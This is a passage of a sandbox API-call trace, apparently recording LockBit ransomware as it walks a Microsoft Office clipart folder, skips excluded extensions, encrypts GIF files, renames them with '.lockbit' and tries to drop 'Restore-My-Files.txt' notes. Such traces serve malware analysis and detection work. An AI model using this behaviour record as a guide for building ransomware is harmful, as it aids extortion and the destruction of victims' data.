(lpString1=".dbf", lpString2=".GIF") returned -1 [0100.974] lstrcmpiW (lpString1=".dbc", lpString2=".GIF") returned -1 [0100.974] lstrcmpiW (lpString1=".dbs", lpString2=".GIF") returned -1 [0100.974] lstrcmpiW (lpString1=".dbt", lpString2=".GIF") returned -1 [0100.975] lstrcmpiW (lpString1=".dbv", lpString2=".GIF") returned -1 [0100.975] lstrcmpiW (lpString1=".frm", lpString2=".GIF") returned -1 [0100.975] lstrcmpiW (lpString1=".mdf", lpString2=".GIF") returned 1 [0100.975] lstrcmpiW (lpString1=".mrg", lpString2=".GIF") returned 1 [0100.975] lstrcmpiW (lpString1=".mwb", lpString2=".GIF") returned 1 [0100.975] lstrcmpiW (lpString1=".myd", lpString2=".GIF") returned 1 [0100.975] lstrcmpiW (lpString1=".ndf", lpString2=".GIF") returned 1 [0100.975] lstrcmpiW (lpString1=".qry", lpString2=".GIF") returned 1 [0100.975] lstrcmpiW (lpString1=".sdb", lpString2=".GIF") returned 1 [0100.975] lstrcmpiW (lpString1=".sdf", lpString2=".GIF") returned 1 [0100.975] lstrcmpiW (lpString1=".sql", lpString2=".GIF") returned 1 [0100.975] lstrcmpiW (lpString1=".sqlite", lpString2=".GIF") returned 1 [0100.975] lstrcmpiW (lpString1=".sqlite3", lpString2=".GIF") returned 1 [0100.975] lstrcmpiW (lpString1=".sqlitedb", lpString2=".GIF") returned 1 [0100.975] lstrcmpiW (lpString1=".tmd", lpString2=".GIF") returned 1 [0100.975] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00120_.GIF.lockbit") returned 72 [0100.975] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00120_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00120_.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x13e4 [0100.976] CreateIoCompletionPort (FileHandle=0x13e4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0100.976] malloc (_Size=0x40068) returned 0x1ff1e60 [0100.976] GetFileSizeEx (in: hFile=0x13e4, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=3484) returned 1 [0100.976] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0100.979] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0100.979] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0100.979] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0100.982] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0100.982] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0100.982] ReadFile (in: hFile=0x13e4, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0101.175] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00120_.GIF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00120_.GIF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0101.175] malloc (_Size=0xa6) returned 0x77d800 [0101.175] NtSetInformationFile (FileHandle=0x13e4, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d800, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0101.177] free (_Block=0x77d800) [0101.177] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00120_.GIF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0101.177] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0101.177] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0101.178] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x33bee00, ftCreationTime.dwHighDateTime=0x1bd50af, ftLastAccessTime.dwLowDateTime=0x51317770, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x33bee00, ftLastWriteTime.dwHighDateTime=0x1bd50af, nFileSizeHigh=0x0, nFileSizeLow=0xc44, dwReserved0=0x0, dwReserved1=0x0, cFileName="AG00126_.GIF", cAlternateFileName="")) returned 1 [0101.178] lstrcmpiW (lpString1=".", lpString2="AG00126_.GIF") returned -1 [0101.178] lstrcmpiW (lpString1="..", lpString2="AG00126_.GIF") returned -1 [0101.178] PathFindExtensionW (pszPath="AG00126_.GIF") returned=".GIF" [0101.178] lstrcmpiW (lpString1=".386", lpString2=".GIF") returned -1 [0101.178] lstrcmpiW (lpString1=".cmd", lpString2=".GIF") returned -1 [0101.178] lstrcmpiW (lpString1=".exe", lpString2=".GIF") returned -1 [0101.178] lstrcmpiW (lpString1=".ani", lpString2=".GIF") returned -1 [0101.178] lstrcmpiW (lpString1=".adv", lpString2=".GIF") returned -1 [0101.178] lstrcmpiW (lpString1=".theme", lpString2=".GIF") returned 1 [0101.178] lstrcmpiW (lpString1=".msi", lpString2=".GIF") returned 1 [0101.178] lstrcmpiW (lpString1=".msp", lpString2=".GIF") returned 1 [0101.178] lstrcmpiW (lpString1=".com", lpString2=".GIF") returned -1 [0101.178] lstrcmpiW (lpString1=".diagpkg", lpString2=".GIF") returned -1 [0101.178] lstrcmpiW (lpString1=".nls", lpString2=".GIF") returned 1 [0101.178] lstrcmpiW (lpString1=".diagcab", lpString2=".GIF") returned -1 [0101.178] lstrcmpiW (lpString1=".lock", lpString2=".GIF") returned 1 [0101.178] lstrcmpiW (lpString1=".ocx", lpString2=".GIF") returned 1 [0101.178] lstrcmpiW (lpString1=".mpa", lpString2=".GIF") returned 1 [0101.178] lstrcmpiW (lpString1=".cpl", lpString2=".GIF") returned -1 [0101.178] lstrcmpiW (lpString1=".mod", lpString2=".GIF") returned 1 [0101.178] lstrcmpiW (lpString1=".hta", lpString2=".GIF") returned 1 [0101.178] lstrcmpiW (lpString1=".icns", lpString2=".GIF") returned 1 [0101.178] lstrcmpiW (lpString1=".prf", lpString2=".GIF") returned 1 [0101.179] lstrcmpiW (lpString1=".rtp", lpString2=".GIF") returned 1 [0101.179] lstrcmpiW (lpString1=".diagcfg", lpString2=".GIF") returned -1 [0101.179] lstrcmpiW (lpString1=".msstyles", lpString2=".GIF") returned 1 [0101.179] lstrcmpiW (lpString1=".bin", lpString2=".GIF") returned -1 [0101.179] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0101.179] lstrcmpiW (lpString1=".shs", lpString2=".GIF") returned 1 [0101.179] lstrcmpiW (lpString1=".drv", lpString2=".GIF") returned -1 [0101.179] lstrcmpiW (lpString1=".wpx", lpString2=".GIF") returned 1 [0101.179] lstrcmpiW (lpString1=".bat", lpString2=".GIF") returned -1 [0101.179] lstrcmpiW (lpString1=".rom", lpString2=".GIF") returned 1 [0101.179] lstrcmpiW (lpString1=".msc", lpString2=".GIF") returned 1 [0101.179] lstrcmpiW (lpString1=".spl", lpString2=".GIF") returned 1 [0101.179] lstrcmpiW (lpString1=".ps1", lpString2=".GIF") returned 1 [0101.179] lstrcmpiW (lpString1=".msu", lpString2=".GIF") returned 1 [0101.179] lstrcmpiW (lpString1=".ics", lpString2=".GIF") returned 1 [0101.179] lstrcmpiW (lpString1=".key", lpString2=".GIF") returned 1 [0101.179] lstrcmpiW (lpString1=".mp3", lpString2=".GIF") returned 1 [0101.179] lstrcmpiW (lpString1=".reg", lpString2=".GIF") returned 1 [0101.179] lstrcmpiW (lpString1=".dll", lpString2=".GIF") returned -1 [0101.179] lstrcmpiW (lpString1=".ini", lpString2=".GIF") returned 1 [0101.179] lstrcmpiW (lpString1=".idx", lpString2=".GIF") returned 1 [0101.179] lstrcmpiW (lpString1=".sys", lpString2=".GIF") returned 1 [0101.179] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0101.179] lstrcmpiW (lpString1=".ico", lpString2=".GIF") returned 1 [0101.180] lstrcmpiW (lpString1=".lnk", lpString2=".GIF") returned 1 [0101.180] lstrcmpiW (lpString1=".rdp", lpString2=".GIF") returned 1 [0101.180] lstrcmpiW (lpString1=".lockbit", lpString2=".GIF") returned 1 [0101.180] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="AG00126_.GIF") returned 1 [0101.180] lstrcmpiW (lpString1="ntldr", lpString2="AG00126_.GIF") returned 1 [0101.180] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="AG00126_.GIF") returned 1 [0101.180] lstrcmpiW (lpString1="bootsect.bak", lpString2="AG00126_.GIF") returned 1 [0101.180] lstrcmpiW (lpString1="autorun.inf", lpString2="AG00126_.GIF") returned 1 [0101.180] lstrcmpiW (lpString1="thumbs.db", lpString2="AG00126_.GIF") returned 1 [0101.180] lstrcmpiW (lpString1="iconcache.db", lpString2="AG00126_.GIF") returned 1 [0101.180] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0101.180] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00126_.GIF") returned=".GIF" [0101.180] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0101.180] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0101.180] lstrcmpiW (lpString1=".7z", lpString2=".GIF") returned -1 [0101.180] lstrcmpiW (lpString1=".ckp", lpString2=".GIF") returned -1 [0101.180] lstrcmpiW (lpString1=".dacpac", lpString2=".GIF") returned -1 [0101.180] lstrcmpiW (lpString1=".db", lpString2=".GIF") returned -1 [0101.180] lstrcmpiW (lpString1=".db-shm", lpString2=".GIF") returned -1 [0101.180] lstrcmpiW (lpString1=".db-wal", lpString2=".GIF") returned -1 [0101.180] lstrcmpiW (lpString1=".db3", lpString2=".GIF") returned -1 [0101.180] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0101.180] lstrcmpiW (lpString1=".dbc", lpString2=".GIF") returned -1 [0101.180] lstrcmpiW (lpString1=".dbs", lpString2=".GIF") returned -1 [0101.181] lstrcmpiW (lpString1=".dbt", lpString2=".GIF") returned -1 [0101.181] lstrcmpiW (lpString1=".dbv", lpString2=".GIF") returned -1 [0101.181] lstrcmpiW (lpString1=".frm", lpString2=".GIF") returned -1 [0101.181] lstrcmpiW (lpString1=".mdf", lpString2=".GIF") returned 1 [0101.181] lstrcmpiW (lpString1=".mrg", lpString2=".GIF") returned 1 [0101.181] lstrcmpiW (lpString1=".mwb", lpString2=".GIF") returned 1 [0101.181] lstrcmpiW (lpString1=".myd", lpString2=".GIF") returned 1 [0101.181] lstrcmpiW (lpString1=".ndf", lpString2=".GIF") returned 1 [0101.181] lstrcmpiW (lpString1=".qry", lpString2=".GIF") returned 1 [0101.181] lstrcmpiW (lpString1=".sdb", lpString2=".GIF") returned 1 [0101.181] lstrcmpiW (lpString1=".sdf", lpString2=".GIF") returned 1 [0101.181] lstrcmpiW (lpString1=".sql", lpString2=".GIF") returned 1 [0101.181] lstrcmpiW (lpString1=".sqlite", lpString2=".GIF") returned 1 [0101.181] lstrcmpiW (lpString1=".sqlite3", lpString2=".GIF") returned 1 [0101.181] lstrcmpiW (lpString1=".sqlitedb", lpString2=".GIF") returned 1 [0101.181] lstrcmpiW (lpString1=".tmd", lpString2=".GIF") returned 1 [0101.181] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00126_.GIF.lockbit") returned 72 [0101.181] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00126_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00126_.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xa50 [0101.182] CreateIoCompletionPort (FileHandle=0xa50, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0101.182] malloc (_Size=0x40068) returned 0x3e30008 [0101.182] GetFileSizeEx (in: hFile=0xa50, lpFileSize=0x3e30020 | out: lpFileSize=0x3e30020*=3140) returned 1 [0101.182] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0101.184] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0101.184] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e7003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e7003c) returned 0x0 [0101.184] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0101.186] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0101.186] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e7004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e7004c) returned 0x0 [0101.186] ReadFile (in: hFile=0xa50, lpBuffer=0x3e3003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e30008 | out: lpBuffer=0x3e3003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e30008) returned 0x0 [0101.198] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00126_.GIF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00126_.GIF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0101.199] malloc (_Size=0xa6) returned 0x77d800 [0101.199] NtSetInformationFile (FileHandle=0xa50, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d800, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0101.200] free (_Block=0x77d800) [0101.200] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00126_.GIF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0101.200] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0101.200] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0101.200] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd99400, ftCreationTime.dwHighDateTime=0x1bd50af, ftLastAccessTime.dwLowDateTime=0x51317770, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xd99400, ftLastWriteTime.dwHighDateTime=0x1bd50af, nFileSizeHigh=0x0, nFileSizeLow=0x30c2, dwReserved0=0x0, dwReserved1=0x0, cFileName="AG00129_.GIF", cAlternateFileName="")) returned 1 [0101.200] lstrcmpiW (lpString1=".", lpString2="AG00129_.GIF") returned -1 [0101.200] lstrcmpiW (lpString1="..", lpString2="AG00129_.GIF") returned -1 [0101.200] PathFindExtensionW (pszPath="AG00129_.GIF") returned=".GIF" [0101.200] lstrcmpiW (lpString1=".386", lpString2=".GIF") returned -1 [0101.200] lstrcmpiW (lpString1=".cmd", lpString2=".GIF") returned -1 [0101.200] lstrcmpiW (lpString1=".exe", lpString2=".GIF") returned -1 [0101.200] lstrcmpiW (lpString1=".ani", lpString2=".GIF") returned -1 [0101.200] lstrcmpiW (lpString1=".adv", lpString2=".GIF") returned -1 [0101.201] lstrcmpiW (lpString1=".theme", lpString2=".GIF") returned 1 [0101.201] lstrcmpiW (lpString1=".msi", lpString2=".GIF") returned 1 [0101.201] lstrcmpiW (lpString1=".msp", lpString2=".GIF") returned 1 [0101.201] lstrcmpiW (lpString1=".com", lpString2=".GIF") returned -1 [0101.201] lstrcmpiW (lpString1=".diagpkg", lpString2=".GIF") returned -1 [0101.201] lstrcmpiW (lpString1=".nls", lpString2=".GIF") returned 1 [0101.201] lstrcmpiW (lpString1=".diagcab", lpString2=".GIF") returned -1 [0101.201] lstrcmpiW (lpString1=".lock", lpString2=".GIF") returned 1 [0101.201] lstrcmpiW (lpString1=".ocx", lpString2=".GIF") returned 1 [0101.201] lstrcmpiW (lpString1=".mpa", lpString2=".GIF") returned 1 [0101.201] lstrcmpiW (lpString1=".cpl", lpString2=".GIF") returned -1 [0101.201] lstrcmpiW (lpString1=".mod", lpString2=".GIF") returned 1 [0101.201] lstrcmpiW (lpString1=".hta", lpString2=".GIF") returned 1 [0101.201] lstrcmpiW (lpString1=".icns", lpString2=".GIF") returned 1 [0101.201] lstrcmpiW (lpString1=".prf", lpString2=".GIF") returned 1 [0101.202] lstrcmpiW (lpString1=".rtp", lpString2=".GIF") returned 1 [0101.202] lstrcmpiW (lpString1=".diagcfg", lpString2=".GIF") returned -1 [0101.202] lstrcmpiW (lpString1=".msstyles", lpString2=".GIF") returned 1 [0101.202] lstrcmpiW (lpString1=".bin", lpString2=".GIF") returned -1 [0101.202] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0101.202] lstrcmpiW (lpString1=".shs", lpString2=".GIF") returned 1 [0101.202] lstrcmpiW (lpString1=".drv", lpString2=".GIF") returned -1 [0101.202] lstrcmpiW (lpString1=".wpx", lpString2=".GIF") returned 1 [0101.202] lstrcmpiW (lpString1=".bat", lpString2=".GIF") returned -1 [0101.202] lstrcmpiW (lpString1=".rom", lpString2=".GIF") returned 1 [0101.202] lstrcmpiW (lpString1=".msc", lpString2=".GIF") returned 1 [0101.202] lstrcmpiW (lpString1=".spl", lpString2=".GIF") returned 1 [0101.202] lstrcmpiW (lpString1=".ps1", lpString2=".GIF") returned 1 [0101.202] lstrcmpiW (lpString1=".msu", lpString2=".GIF") returned 1 [0101.203] lstrcmpiW (lpString1=".ics", lpString2=".GIF") returned 1 [0101.203] lstrcmpiW (lpString1=".key", lpString2=".GIF") returned 1 [0101.203] lstrcmpiW (lpString1=".mp3", lpString2=".GIF") returned 1 [0101.203] lstrcmpiW (lpString1=".reg", lpString2=".GIF") returned 1 [0101.203] lstrcmpiW (lpString1=".dll", lpString2=".GIF") returned -1 [0101.203] lstrcmpiW (lpString1=".ini", lpString2=".GIF") returned 1 [0101.203] lstrcmpiW (lpString1=".idx", lpString2=".GIF") returned 1 [0101.203] lstrcmpiW (lpString1=".sys", lpString2=".GIF") returned 1 [0101.203] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0101.203] lstrcmpiW (lpString1=".ico", lpString2=".GIF") returned 1 [0101.203] lstrcmpiW (lpString1=".lnk", lpString2=".GIF") returned 1 [0101.203] lstrcmpiW (lpString1=".rdp", lpString2=".GIF") returned 1 [0101.210] lstrcmpiW (lpString1=".lockbit", lpString2=".GIF") returned 1 [0101.210] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="AG00129_.GIF") returned 1 [0101.210] lstrcmpiW (lpString1="ntldr", lpString2="AG00129_.GIF") returned 1 [0101.210] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="AG00129_.GIF") returned 1 [0101.210] lstrcmpiW (lpString1="bootsect.bak", lpString2="AG00129_.GIF") returned 1 [0101.210] lstrcmpiW (lpString1="autorun.inf", lpString2="AG00129_.GIF") returned 1 [0101.210] lstrcmpiW (lpString1="thumbs.db", lpString2="AG00129_.GIF") returned 1 [0101.210] lstrcmpiW (lpString1="iconcache.db", lpString2="AG00129_.GIF") returned 1 [0101.210] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0101.210] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00129_.GIF") returned=".GIF" [0101.211] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0101.211] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0101.211] lstrcmpiW (lpString1=".7z", lpString2=".GIF") returned -1 [0101.211] lstrcmpiW (lpString1=".ckp", lpString2=".GIF") returned -1 [0101.211] lstrcmpiW (lpString1=".dacpac", lpString2=".GIF") returned -1 [0101.211] lstrcmpiW (lpString1=".db", lpString2=".GIF") returned -1 [0101.211] lstrcmpiW (lpString1=".db-shm", lpString2=".GIF") returned -1 [0101.211] lstrcmpiW (lpString1=".db-wal", lpString2=".GIF") returned -1 [0101.211] lstrcmpiW (lpString1=".db3", lpString2=".GIF") returned -1 [0101.211] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0101.211] lstrcmpiW (lpString1=".dbc", lpString2=".GIF") returned -1 [0101.211] lstrcmpiW (lpString1=".dbs", lpString2=".GIF") returned -1 [0101.211] lstrcmpiW (lpString1=".dbt", lpString2=".GIF") returned -1 [0101.211] lstrcmpiW (lpString1=".dbv", lpString2=".GIF") returned -1 [0101.211] lstrcmpiW (lpString1=".frm", lpString2=".GIF") returned -1 [0101.211] lstrcmpiW (lpString1=".mdf", lpString2=".GIF") returned 1 [0101.211] lstrcmpiW (lpString1=".mrg", lpString2=".GIF") returned 1 [0101.211] lstrcmpiW (lpString1=".mwb", lpString2=".GIF") returned 1 [0101.211] lstrcmpiW (lpString1=".myd", lpString2=".GIF") returned 1 [0101.211] lstrcmpiW (lpString1=".ndf", lpString2=".GIF") returned 1 [0101.211] lstrcmpiW (lpString1=".qry", lpString2=".GIF") returned 1 [0101.212] lstrcmpiW (lpString1=".sdb", lpString2=".GIF") returned 1 [0101.212] lstrcmpiW (lpString1=".sdf", lpString2=".GIF") returned 1 [0101.212] lstrcmpiW (lpString1=".sql", lpString2=".GIF") returned 1 [0101.212] lstrcmpiW (lpString1=".sqlite", lpString2=".GIF") returned 1 [0101.212] lstrcmpiW (lpString1=".sqlite3", lpString2=".GIF") returned 1 [0101.212] lstrcmpiW (lpString1=".sqlitedb", lpString2=".GIF") returned 1 [0101.212] lstrcmpiW (lpString1=".tmd", lpString2=".GIF") returned 1 [0101.212] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00129_.GIF.lockbit") returned 72 [0101.212] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00129_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00129_.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x334 [0101.213] CreateIoCompletionPort (FileHandle=0x334, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0101.213] malloc (_Size=0x40068) returned 0x3d70048 [0101.213] GetFileSizeEx (in: hFile=0x334, lpFileSize=0x3d70060 | out: lpFileSize=0x3d70060*=12482) returned 1 [0101.213] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0101.216] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0101.216] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db007c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db007c) returned 0x0 [0101.216] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0101.218] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0101.219] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db008c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db008c) returned 0x0 [0101.219] ReadFile (in: hFile=0x334, lpBuffer=0x3d7007c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70048 | out: lpBuffer=0x3d7007c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70048) returned 1 [0101.241] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00129_.GIF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00129_.GIF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0101.241] malloc (_Size=0xa6) returned 0x77d800 [0101.241] NtSetInformationFile (FileHandle=0x334, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d800, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0101.242] free (_Block=0x77d800) [0101.242] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00129_.GIF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0101.242] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0101.243] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0101.243] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xffa86700, ftCreationTime.dwHighDateTime=0x1bd50ae, ftLastAccessTime.dwLowDateTime=0x5eb42550, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xffa86700, ftLastWriteTime.dwHighDateTime=0x1bd50ae, nFileSizeHigh=0x0, nFileSizeLow=0x1485, dwReserved0=0x0, dwReserved1=0x0, cFileName="AG00130_.GIF", cAlternateFileName="")) returned 1 [0101.243] lstrcmpiW (lpString1=".", lpString2="AG00130_.GIF") returned -1 [0101.243] lstrcmpiW (lpString1="..", lpString2="AG00130_.GIF") returned -1 [0101.243] PathFindExtensionW (pszPath="AG00130_.GIF") returned=".GIF" [0101.243] lstrcmpiW (lpString1=".386", lpString2=".GIF") returned -1 [0101.243] lstrcmpiW (lpString1=".cmd", lpString2=".GIF") returned -1 [0101.243] lstrcmpiW (lpString1=".exe", lpString2=".GIF") returned -1 [0101.243] lstrcmpiW (lpString1=".ani", lpString2=".GIF") returned -1 [0101.243] lstrcmpiW (lpString1=".adv", lpString2=".GIF") returned -1 [0101.243] lstrcmpiW (lpString1=".theme", lpString2=".GIF") returned 1 [0101.243] lstrcmpiW (lpString1=".msi", lpString2=".GIF") returned 1 [0101.243] lstrcmpiW (lpString1=".msp", lpString2=".GIF") returned 1 [0101.243] lstrcmpiW (lpString1=".com", lpString2=".GIF") returned -1 [0101.243] lstrcmpiW (lpString1=".diagpkg", lpString2=".GIF") returned -1 [0101.243] lstrcmpiW (lpString1=".nls", lpString2=".GIF") returned 1 [0101.243] lstrcmpiW (lpString1=".diagcab", lpString2=".GIF") returned -1 [0101.243] lstrcmpiW (lpString1=".lock", lpString2=".GIF") returned 1 [0101.243] lstrcmpiW (lpString1=".ocx", lpString2=".GIF") returned 1 [0101.243] lstrcmpiW (lpString1=".mpa", lpString2=".GIF") returned 1 [0101.244] 